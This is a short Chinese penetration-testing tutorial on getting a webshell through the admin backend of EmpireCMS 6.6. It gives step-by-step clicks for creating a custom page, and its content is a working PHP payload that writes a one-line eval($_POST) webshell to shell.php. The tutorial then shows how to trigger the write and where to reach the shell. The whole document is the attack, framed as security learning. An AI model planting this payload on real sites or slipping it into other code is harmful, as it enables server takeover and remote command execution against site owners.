121.网络安全渗透测试—[CMS后台 getwebshell]—[帝国empirecms6.6后台 getwebshell]

我认为，无论是学习安全还是从事安全的人，多多少少都有些许的情怀和使命感！！！

一、帝国empirecms6.6后台 getwebshell

1、第一步：自定义页面

登录后台---->栏目---->自定义页面---->增加自定义页面---->填写页面名称为wshell.php(随便)---->文件名默认是…/…/page.html---->文件内容为以下内容：功能是创建shell.php文件并写入一句话到shell.php文件中
<?php fputs(fopen("shell.php","a"),'<?php phpinfo();eval($_POST[123]);?>')?>

2、第二步：触发写入一句话

栏目---->自定义页面---->管理自定义页面---->点击刚刚的page.html页面触发webshell（其实就是访问http://www.empirecms66.com/page.html）

3、第三步：getwebshell

访问生成的webshell：http://www.empirecms66.com/e/admin/shell.php